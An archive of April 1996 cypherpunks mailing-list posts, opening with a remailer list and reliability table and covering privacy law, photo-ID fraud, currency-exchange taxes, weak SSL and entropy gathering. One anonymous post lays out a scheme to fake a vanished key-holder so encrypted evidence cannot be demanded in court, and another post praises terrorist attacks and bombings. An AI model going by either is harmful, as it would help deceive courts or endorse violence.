$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{'cubed'} = '<alias@alias.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 8 Apr 96 6:48:25 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
cubed    alias@alias.alias.net            *+#*********    15:15 100.00%
exon     remailer@remailer.nl.com         **-*++++***+     7:10 100.00%
ecafe    cpunk@remail.ecafe.org           ######*#+###      :53  99.99%
shinobi  remailer@shinobi.alias.net       ###*###+-.-#    57:53  99.96%
ncognito ncognito@gate.net                **-###***#*#     1:58  99.95%
spook    remailer@spook.alias.net         **+****+****    19:38  99.92%
mix      mixmaster@remail.obscura.com     --*-+-+-++++  4:47:31  99.92%
amnesia  amnesia@chardos.connix.com       -+++----++-   2:23:46  99.89%
portal   hfinney@shell.portal.com         #*##- *#####     6:42  99.89%
alpha    alias@alpha.c2.org               ++**++ ++++*    43:53  99.83%
vishnu   mixmaster@vishnu.alias.net       **--+*+--.-*  5:31:24  99.82%
treehole remailer@mockingbird.alias.net    -+++---..-+  7:01:45  99.73%
alumni   hal@alumni.caltech.edu           -###-### ###    25:20  99.66%
vegas    remailer@vegas.gateway.com       #+##-* -***+  1:08:32  99.49%
hacktic  remailer@utopia.hacktic.nl       ****** *****     8:32  99.37%
flame    remailer@flame.alias.net         ------ ----   4:10:53  98.99%
penet    anon@anon.penet.fi               _..._---.--  27:54:21  98.63%
replay   remailer@replay.com              +**+   -****    15:48  98.40%
nymrod   nymrod@nym.alias.net             *+--**+--. *  6:11:27  98.39%
c2       remail@c2.org                    -+++ +++++++    40:17  97.18%
gondonym alias@nym.gondolin.org           -+---+ .-    16:49:10  89.13%
extropia remail@miron.vip.best.com        -- -------    7:03:22  88.90%
gondolin mix@remail.gondolin.org          -----+ .-    15:51:19  88.04%
haystack haystack@holy.cow.net            ***+*#*-##      47:06  84.29%
lead     mix@zifi.genetics.utah.edu               ++++    38:07  69.04%
nemesis  remailer@meaning.com             *****         2:39:59  38.60%
tjava    remailer@tjava.com                                1:02  -3.94%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Apr 1996 05:42:19 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u6JO3-00090zC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 PM 4/7/96 -0700, david friedman wrote:
>Unicorn wrote:
>
>> No ISP in its right mind is going to ask for trouble.  If I'm a
>>prosecutor and I suspect that the ISP may be complicit in hiding
>>evidence, I'm going to ask for a search and seizure warrant (a la sun
>>devil) and just walk in and take the equipment I believe the data to be
>>on and then satisify myself that it's unattainable.
>
>Last semester I taught a seminar on computers, crime, and privacy and we
>had, as a guest lecturer one evening, Silicon Valley's one full time
>computer cop (he works for the SC County D.A.'s office). One of his
>comments was that ISP's were generally very cooperative, because they knew
>that he could legally impose large costs on them by seizing their systems
>as evidence.

It is exactly this attitude that we need to change.  I presume you saw my 
comment from a day ago, when I pointed out that before 1968, local phonecos 
were doing wiretaps without any sort of court order, simply because the 
local cops (or FBI) asked, even though those requesting the tap could not 
use the evidence in court.   And even _that_ level of cooperation was 
presumably done without any plausible risk that the prosecutor could sieze 
a phone switch for non-cooperation.  It is even likely that the phoneco 
could have acted to lose the prosecutor/police his job if they had decided to press 
and publicize what must have been an illegal request at the time.  The fact 
they did not is telling. It was clearly not an "arm's length" relationship.  
It was a relationship of friendly people who regularly did favors for each 
other, playing with their customer's privacy.

This is the reality that we must face and deal with:  Officials abuse their 
positions all the time. They will do so if the system is designed to allow 
them to.  Allowing officials to sieze an ISP's equipment is just asking for 
trouble.  

In my opinion, ISP's should be able to decide ahead of time whether to 
cooperate if they are asked for information.  They should be entitled to 
take a position that they will (or will not) contract with their users to 
prevent any disclosure of information, and this decision should be legally 
binding on the prosecutor as well.  The "feedback loop" is closed by the 
fact that bad publicity may accrue if the ISP refuses to cooperate, leading 
to a "market" of different ISP's with different standards.  I am convinced 
that whatever benefit may arguably accrue from being able to subpoena 
information is far lower than the cost of loss of freedom that surely will 
occur if prosecutors are able to strong-arm ISP's into illegal cooperation, 
such as occurred with phonecos before 1968.

I'm still waiting for somebody to show that the majority of crimes that are 
investigated using subpoena power are "malum in se" crimes, as opposed to 
"malum prohibitum" ones.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 9 Apr 1996 06:29:46 +0800
To: cypherpunks@toad.com
Subject: Re: Australia's New South Wales tries net-censorship
In-Reply-To: <v02140b01ad8e4283e85d@[166.84.254.3]>
Message-ID: <199604081601.JAA23412@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Robert A. Rosenberg" <hal9001@panix.com> writes:

 > At 17:47 4/6/96, David K. Merriman wrote:

 >> Makes me wonder if browser companies/authors couldn't be
 >> dragged into any such conflicts. If Person A inadvertently
 >> stumbles across Pedophiles 'R' Us on the net, and quickly
 >> moves on, I have yet to see a browser that lets him/her say
 >> "quick - delete that last cacheing operation", thus *making*
 >> him/her 'guilty' of criminal possession.

 > Netscape in the Cache Preferences has a button to delete
 > your cache contents so button would seem to serve this need
 > (while being a little overkill for this capability since it
 > deletes everything and you must then rebuild your cache from
 > scratch).

While I doubt that many people inadvertantly stumble across the
mother load of illegal porn on the Web, the "store and forward"
nature of Usenet can certainly create such problems, particularly
for those in the habit of grabbing all new messages in their
favorite newsgroups before reading them.

I'd be interested to know if the courts have ever had a case in
which a person has been declared to have been in "possession" of
illegal material merely by virtue of its momentary presence in
their cache, screen buffer, or usenet spool.

There is a case now involving the University of Pittsburgh in
which the Feds are attempting to prove that an individual was in
possession of certain child porn images on his own PC during a
brief span of time in 1993.

There was also a case in which a BBS operator was charged based
on an allegedly illegal image found in a directory containing
unchecked user uploads.  Had the cops done nothing, the image
would have been wiped shortly thereafter.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 9 Apr 1996 04:15:12 +0800
To: cypherpunks@toad.com
Subject: RAS_put
Message-ID: <199604081507.LAA11674@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-08-96 WSJ eyes the Rasputin of the plot linking:

   1. Encryption export
   2. Microsoft
   3. The Seychelles
   4. Internet regulation
   5. Privacy rights
   6. Immigration reform
   7. Anti-taxation
   8. The computer industry


   RAS_put











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Tue, 9 Apr 1996 08:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't Work
Message-ID: <199604081810.LAA22544@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 AM 4/8/96 +0000, you wrote:
>This comes from the FTC Privacy List, and is somewhat relevant....
>(The the "Crypto" in the title isn't, oddly...).
>
>Some thoughts... (er, questions):
>1. What are the implications for log-on systems that rely on 
>recognition of faces (supposedly impossible for hackers to describe 
>and exploit)?

Does anybody know how well these systems work? If I don't shave over the
weekend will my computer know who I am Monday morning? Is my credit card
going to have my face digitized and encoded onto the mag stipe for
comparision with a video camera image at the time of sale?

>2. Legal implications for witnesses?
>
I think many eyewitness accounts are already taken with a grain of salt, at
least as far as picking a suspect. Certainly in court the lawyers say
whatever makes their case look better.

>------- Forwarded Message Follows -------
>Date:          Sun, 7 Apr 1996 08:24:18 -0700
>From:          taxhaven@ix.netcom.com (Adam Starchild )
>Subject:       British Study Claims That Photo Credit Cards Don't Work
>To:            privacy@ftc.gov
>
>                 "Crypto-ID" Cards Not Effective
>
>     Recent studies into the effectiveness of photo credit cards
>have cast doubt over their ability to cut fraud.  Dr. Richard
>Kemp, of the Department of Psychology at Westminster University,
>London, organized an experiment involving a London supermarket to
>test the cards in "the real world."

Most if not all credit card issuing banks use some form of fraud detection
software. The next generation of these products will be analyzing
transaction data from the card clearing banks in real time to stop
fraudulent transactions before they are complete. Expect to see more "may I
see your ID" questions as these systems flag transactions as possible fraud.
I have had a credit card with my photo on it for several years, I can't ever
remember a sales person who seemed at all interested in comparing the photo
to me. 


>     The supermarket was staffed by six people who were all
>warned to be on the look out for fraudulent credit cards.  Dr.
>Kemp arranged for 44 of his students to pose as shoppers and test
>the staffs' ability to spot photo-card misuse.  Each student was
>armed with four cards.  One showed the student as they were, one
>showed the student wearing make-up, one showed an individual who
>vaguely resembled the student and the last card depicted someone
>who looked nothing like the bearer.
>     People usually recognize photographs of individuals based on
>a familiarity of the subject.  A photograph captures only one
>angle and expression out of thousands of different combinations. 
>People will recognize photographs of family, friends and well
>known individuals easily.  But how easy is it to accurately
>compare a photograph with the face of a perfect stranger?  At a
>recent conference, Dr. Kemp said that matching a photo to a
>stranger's face was "too difficult."  He also said that in a non-
>experimental situation, such as a supermarket, the incidence of
>fraud detection would be even lower.
>     The results of Dr. Kemp's supermarket experiment proved very
>interesting.  In all, the majority of fraudulent cards were
>accepted.  Amazingly, 35 per cent of the cards bearing a
>photograph of someone completely different from the student were
>accepted.  A massive 64 per cent of cards bearing a similar
>individual were also accepted.  Another factor which seems to
>further prove Dr. Kemp's point is that 14 per cent of cards
>bearing a true likeness of the student were rejected.
>     A few British banks are already offering customers the
>opportunity to have their photograph etched onto their cards. 
>They claim a reduction in fraud has resulted from this.  Dr.
>Kemp's findings would seem to contradict this belief.  Dr. Nicky
>Towell, one of Dr. Kemp's researchers, said "There is a widely
>held assumption that photo credit cards are a cheap and effective
>way of stopping fraud.  But this is not the case."
>     No one can tell how well photo credit cards will catch on. 
>But with the majority of people carrying at least one, if not
>more cards of some sort, how long will it be before photos become
>compulsory?  The government knows that the introduction of ID
>cards is a political hot potato, but how many people would notice
>if they turned the cards we already have into crypto-ID cards?
>
>
>Reprinted from The Mouse Monitor, The International Journal of
>Bureau-Rat Control, a periodical published by Scope International
>for its customers.  Scope International is on the Worldwide Web
>at http://www.britnet.co.uk/Scope/
>
>
>Posted by Adam Starchild
>     The Offshore Entrepreneur at http://www.au.com/offshore
>
>
>
>The privacy list is run automatically by the Majordomo list manager.
>Send a "help" command to majordomo@ftc.gov for assistance.
>
>Rob. 
>
>---
>Send a blank message with the subject "send pgp-key"
>to <WlkngOwl@unix.asb.com> for a copy of my PGP key.
>
>
dwl@hnc.com		
David Loysen		
619-546-8877 x245		
			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Apr 1996 05:46:26 +0800
To: WlkngOwl@UNiX.asb.com>
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't Work
In-Reply-To: <199604080500.BAA19015@unix.asb.com>
Message-ID: <slOHFry00YUv8B5Gwy@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Apr-96 (Fwd) British Study Claims
.. by "Deranged Mutant"@UNiX.a 
>      The results of Dr. Kemp's supermarket experiment proved very
> interesting.  In all, the majority of fraudulent cards were
> accepted.  Amazingly, 35 per cent of the cards bearing a
> photograph of someone completely different from the student were
> accepted.  A massive 64 per cent of cards bearing a similar
> individual were also accepted.  Another factor which seems to

Fascinating stuff. I've used Mike Godwin's driver's license to buy a
beer when I didn't have mine with me. And, trust me, we look nothing
alike.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 9 Apr 1996 05:41:59 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don'
Message-ID: <199604081600.MAA15467@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Apr 96 at 11:44, Declan B. McCullagh wrote:

> Fascinating stuff. I've used Mike Godwin's driver's license to buy a
> beer when I didn't have mine with me. And, trust me, we look nothing
> alike.

*chuckle*

It was a semi-common practice when I was in high school to show 
licenses to buy beer, because they never looked at the birth dates.  
The state got wise to it and now put in big red letters "UNDER 21" on 
minor's licenses....

 
Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <peponmc@Fe3.rust.net>
Date: Tue, 9 Apr 1996 06:46:20 +0800
To: cypherpunks@toad.com
Subject: Re: They're running scared.
Message-ID: <199604081638.MAA03875@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  Sun, 07 Apr 1996, jim bell wrote:

[article snipped]

>Articles such as this are interesting because they appear to be written 
>without any illusion that the interests of governments are anything other 
>than just that, interests of governments.  They are NOT the interests 
>of the average citizen.

Absolutly, and it seems that more and more thinking people are 
realizing this, as for the non-thinking ones, well we are better off 
without them, the only thing they contribute are problems

Debate works to a point, but there comes a point and time where all 
that can be said, has been said, and we are past that point.

Personally, I love national insecurity such as terrorist attacks and 
random bombings, wish there were more of them by more people.

What they do is sow fear, instensify camps, and pit people against 
each other.  

Goverments are use to wars, where there are large, well-defined 
groups assult one another, they have huge problems dealing with small 
groups of people attack it or each other.  That is what will 
eventually cause it to collapes, which is a good thing.

For those who say that such an event would be catostrophic, that is a 
myth, I worked with someone from Berut a few years ago, when the 
goverment there collapesed.  He said other than the perpetual mortor 
fire, and speratic bombings, life went on as usuall.  People got up 
and went to work, people bought and sold, etc.  From a microsopic 
scale, nothing had changed, it was only if you looked at the bigger 
picture that things were different, and quite frankly, those types of 
things do not effect us individually.

I do not need an x trillion dollar economy to continue living at my 
standard of living, most of us on this list do not, the only people 
that benifit are the power brokers and the dumb, weak, and stupid.

I have nothing against charity(that's what taxes amount to), but when charity 
reaches 50%+  of my income, and starts to erode my freedom, well now it's
a problem.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBMWkWWUUffSIjnthhAQHEiQP/Sp5+UfCFGmvEO/9nRFBLXBm9haPiJC/y
oVCoKQi/jeCkXy1HaPjrrObFkV0fvRsHxk5GvHXfX9sIkFi/i9mrGafpXFUuRfkP
qua2wYp91Omh39QptHThGgEKl0sdKBzw+/9uHCqwUyViqoZZBO7Y7kUGffT9XL9m
13VTjMTyFz4=
=e+UM
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Available from MIT KeyServer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 9 Apr 1996 08:39:42 +0800
To: perry@piermont.com
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604081804.OAA03690@jekyll.piermont.com>
Message-ID: <199604081941.MAA00812@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> > Suddenly some banks here in Estonia have decided that they must start
> > offering banking services over Internet already during the next months.
> > What worries me is that some of them are talking about using 40-bit SSL as
> > the main security mechanism.

	Please point these banks to Apache-SSL
(http://www.algroup.co.uk/Apache-SSL/). They can run SSL without
using 8-cent RC4. 

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Tue, 9 Apr 1996 06:06:24 +0800
To: cypherpunks@toad.com
Subject: Re: Spinners and compression functions
Message-ID: <960408124222_464915004@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-08 04:01:28 EDT, stewarts@ix.netcom.com writes:

>Data contains varying quantities of predictablity and unpredictability.
>Some of the predictability has simple enough structure that a basic
>compression function can find and exploit it to squash the data.
>Some of the predictability doesn't.  For what it's worth, compressing
>the data before using it for other things does leave you with somewhat
>more consistent entropy per byte for "typical" random input, because it
>eliminates the easy stuff.

That was the entire point of my original posting on this subject.  I was
proposing using a compression function on spinner data, which contains very
little entropy and compresses well. (50 - 80% on idle loop timing data,
depending on processor load)  I don't believe I said anything about
compressing image data of any kind, or audio recordings of humpback whales
doing the wild thing, etc.  Noise sphere plots of ZIP files look pretty good,
regardless of how good or bad the plot of the unZIPed file looks.  (Raw idle
loop timing plots are terrible.)  I have posted a longer reply to Perry via
E-mail...

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 9 Apr 1996 13:12:03 +0800
To: cypherpunks@toad.com
Subject: Bulletin: Cypherpunks say no taxes owed by moneychangers!
Message-ID: <ad8ea2c0010210042ee1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:23 AM 4/8/96, jim bell wrote:
>At 12:53 PM 4/7/96 PDT, Jim Gillogly wrote:
>>
>>jim bell <jimbell@pacifier.com> writes:
>>>FWIW, I think that there is no capital-gains-type tax on currency
>>>conversions.  In other words, if I take dollars and buy yen today, and the
>>
>>I bounced this off a CPA, who said she would be very suprised if this is
>>really the case: in general the IRS considers increases in wealth to be
>>taxable, and unless there's a specific exclusion for currency transactions
>>that she doesn't know about, she suspects this is not the case.  As a
>>conceptual counterexample she points out that you are responsible for any
>>profit you make from selling your car for more than you pay for it (but,
>>as you might expect, you don't get to take a loss if you sell it for less).
>
>That assumes that there is "profit" from exchanging currencies.  On any
>given transaction, there is never any "profit."  The only thing that might
>be called a profit is a difference in exchange rates, and that really isn't
>an increase in wealth at any point.   Ask that CPA to look it up.

There are people and companies who make a nice business in currency
exchange, ranging from the large companies one finds in international
airline terminals and banks to the smaller, "Mom and Pop" moneychangers one
finds in barrios and other such places.

These moneychangers attempt to make a "profit" on each exchange (else
they'd hardly stay in business).

It will probably come as a surprise to them that, according to both a CPA
and Jim Bell, no taxes are owed on their businesses, as "no wealth was
created."

Don't believe everything you read on this list, folks.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rngaugp@alpha.c2.org
Date: Tue, 9 Apr 1996 09:34:10 +0800
To: cypherpunks@toad.com
Subject: Re:  "Contempt" charges likely to increase
Message-ID: <199604081656.MAA00598@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



This is why raw symetric ciphers should be used, without headers.
PGP should have an option to omit its headers when using the -c
switch. People should not be forced to use outside programs
such as stealth.

In the absence of cryptanalysis, the output of a symetric cipher
looks like random bytes.

Every one should have a hardware RNG on their computer.

"I am sorry your honor, that is a file of random numbers that I
was using to check the output of my RNG."

Or

"I am sorry your honor that is a one-time pad I was planning
to use."

Or how about the purloined letter method? A few years back,
a hack to PGP was published, which gave the user the option
of directly controling the idea key used when encrypting/decrypting
with RSA. There even was a option to make the idea key used
in encrypting key wrong (that is, different than specified in the
encrypted RSA message).

"I am sorry your honor, that file is encrypted so that only
obiwan@galaxy.far.far.away can decrypt. It is too bad that
obiwan is outside the jusisdiction of the court."

(But in fact I can decrypt by directly specifying the idea key.)

By using the wrong idea key, I can fix it so that in the
unlikely event that someone finds obiwan, obiwan finds that
his secret key does not work. (Because the key decrypted by RSA
is wrong.)

With a little thought. you could change the above senerio to
use obiwan@alpha.c2.org and fix it so that obiwan does not
actually exist, and his secret key has been destroyed.
(Create obiwan@alpha.c2.org, but fixit so that his reply
block points off into the weeds. Create a public/secret PGP
keys for obiwan and send the public key to the public key
servers, using remailers. Using remailers, publish a few
signed articles in obiwan's name. Then wipe obiwan's secret key
with pgp -w.) You can now claim that you started a private encrypted
conversation with obiwan@alpha.c2.org. Who unfortunately can not
be found.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 9 Apr 1996 08:21:56 +0800
To: cypherpunks@toad.com
Subject: Re: the cost of untracability?
Message-ID: <ad8ea41b030210048080@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:53 PM 4/7/96, Jim Gillogly wrote:
>jim bell <jimbell@pacifier.com> writes:
>>FWIW, I think that there is no capital-gains-type tax on currency
>>conversions.  In other words, if I take dollars and buy yen today, and the
>
>I bounced this off a CPA, who said she would be very suprised if this is
>really the case: in general the IRS considers increases in wealth to be
>taxable, and unless there's a specific exclusion for currency transactions
>that she doesn't know about, she suspects this is not the case.  As a
>conceptual counterexample she points out that you are responsible for any
>profit you make from selling your car for more than you pay for it (but,
>as you might expect, you don't get to take a loss if you sell it for less).

I think your CPA is clearly misinformed, or one of us has misunderstood the
conditions under which her statement is true.

For example, I read a fair number of corporate earnings reports, and can
assure you that many companies report gains and losses on currency
conversions. (Many companies use derivatives to hedge themselves against
fluctuations in foreign currencies....)

Similarly, if I consult the "Wall Street Journal" I find page after page of
listings for currency prices, futures on currency prices, derivatives
involving said currencies, and so on. I can easily be a "currency
speculator" by calling my broker.

It may come as a surprise to this CPA (and Jim Bell, from his later
message), but gains in this market are taxable, and losses can offset
gains, subject to the usual mumbo jumbo rules.

It is certainly true that if one converts $300 into yen for a trip to
Japan, to have to buy a few beers for cash (Tokyo is expensive), and upon
returning to the U.S. their has been some slight gain (yes, a "profit"),
that the IRS is not interested. This is a matter of practicality, given
that such minor conversions are usually done in cash form, are too small to
worry about (minimal gains...a few bucks in the example shown, and usually
more than erased by the conversion rate differential).

Try speculating _seriously_ in the dollar-yen conversion rate, through the
various options listed in financial newspapers, and then telling the IRS
that a $100,000 profit, say, is not taxable because of what a CPA said.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Apr 1996 07:52:43 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Australia's New South Wales tries net-censorship
In-Reply-To: <199604081601.JAA23412@netcom6.netcom.com>
Message-ID: <glOIyXm00YUvEJA6YF@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Apr-96 Re: Australia's New South
W.. by Mike Duvos@netcom.com 
> I'd be interested to know if the courts have ever had a case in
> which a person has been declared to have been in "possession" of
> illegal material merely by virtue of its momentary presence in
> their cache, screen buffer, or usenet spool.
>  
> There is a case now involving the University of Pittsburgh in
> which the Feds are attempting to prove that an individual was in
> possession of certain child porn images on his own PC during a
> brief span of time in 1993.

For it to be a crime, I would presume that the courts would require
"guilty knowledge" of the act. (At least I hope they would!)

As for the Pitt "child porn" case, I've spoken with the fellow's
roommate and have some more info at:

  http://fight-censorship.dementia.org/fight-censorship/dl?num=1924

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Apr 1996 08:21:32 +0800
To: cypherpunks@toad.com
Subject: why compression doesn't perfectly even out entropy
Message-ID: <199604081756.NAA03659@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jon asked why it is that I contend that a compression algorithm won't
in the general case even out the entropy of a semi-random stream.

The answer can be obtained by simply trying to run gzip over an image,
preferably one that hasn't been compressed. The results are, in
general, very bad, even though images are highly compressable (even
losslessly). I leave the why up as an exercise to the reader.

I have said before and I will say again that the only reliable way of
dealing with a stream that has some amount of randomness mixed in with
it that you wish to distil down into pure random bits is to use solid
reasoning to figure out how many bits of entropy per unit of input you
can actually expect to see, add a large fudge factor to cover your
ass, and then distil down using a cryptographic hash. Anything else
makes me highly nervous. If you can't estimate the amount of entropy
in an input stream from first principles, then you are probably in
trouble and should seek an input stream that you have a better handle
on.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Apr 1996 07:49:15 +0800
To: Jüri Kaljundi <jk@digit.ee>
Subject: Re: Bank transactions on Internet
In-Reply-To: <Pine.GSO.3.92.960408192320.16049B-100000@happyman>
Message-ID: <199604081804.OAA03690@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> Suddenly some banks here in Estonia have decided that they must start
> offering banking services over Internet already during the next months.
> What worries me is that some of them are talking about using 40-bit SSL as
> the main security mechanism.

That seems very silly. Considering that you folks have no laws
preventing you from using better I would suggest not doing something
so foolish -- 40 bit RC4 is almost worthless as a cryptosystem as the
recent paper on key lengths points out.

Perr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Tue, 9 Apr 1996 08:38:34 +0800
To: cypherpunks@toad.com
Subject: Re: Spinners and compression functions
Message-ID: <960408150007_186997947@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I received this via private email, and have been asked by the sender to post
to cpunks.

>Subj:	Re: Spinners and compression functions
>Date:	96-04-08 12:49:29 EDT
>From:	eli+@GS160.SP.CS.CMU.EDU
>Sender:	eli+@GS160.SP.CS.CMU.EDU
>To:	JonWienke@aol.com
>
>In article
><+cmu.andrew.internet.cypherpunks+clNRbLm00UfAE109Nf@andrew.cmu.edu> you
>write:
>>Run the spinner output through a PKZip type compression
>>function, and then seed a PRNG with the output from that.  This would
>provide
>>a means of gauging the amount of entropy that has been fed into the PRNG,
>>(count the bytes output from the compression function) which will allow the
>>program to disallow any output from the PRNG until a sufficient amount of
>>entropy has been fed into it.
>
>If pkzip were a perfect compressor (which doesn't exist), this would
>work well.  What you're doing is measuring entropy with respect to
>pkzip's model of the input language, which can be arbitrarily far off
>from the entropy you'd get with a more powerful model.  This means
>that an attacker who understands the video retrace (or whatever) can
>get an edge on you.  You really can't tell if data is random by
>looking at it -- for example, Nisan published a generator based on
>universal hash functions that provably passes all space-bounded tests,
>which most statistical tests are.
>
